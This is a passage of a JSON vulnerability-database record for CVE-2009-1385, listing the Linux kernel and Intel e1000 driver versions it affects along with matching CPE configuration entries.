      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.18"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7.3.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.11"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6.3.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.36.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.26.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.20"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5.2.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.36.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22_rc1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24_rc1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.36.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.29.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.9"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5.2.30.1"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5.5.4"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6.0.54"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7.2.9"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7.0.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.29.rc2-git1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.17"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6.1.16"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6.0.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.21.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.8"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5.2.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.13"
      },
      {
        "model": "e1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7.4.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.26.5"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7.2.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.36.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.36.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24_rc5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.26.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22_rc7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24_rc4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.22"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7.4.27"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5.7.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5.4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23_rc1"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5.6.10.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.26.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.36.5"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7.1.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.6"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "2.6.30-rc8"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86-64)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3.0 (x86-64)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "4.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "4.0 (x86-64)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.8 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.8 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.2.z (server)"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.3.z (server)"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001876"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-053"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1385"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.4:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.11:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29:rc8-kk:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.9:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:5.5.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.36.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.26.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.6.28",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.12:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.30:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:5.4.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:7.3.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.8:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.30:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:7.0.41:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.36.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.6:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:7.4.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.26.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:5.6.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.7:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.36.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:6.3.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.26.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:5.6.10.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24_rc4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.36.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.26.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:7.0.33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.36.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.2:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.1:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:7.3.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:5.2.30.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "7.4.35",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:5.7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:5.3.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
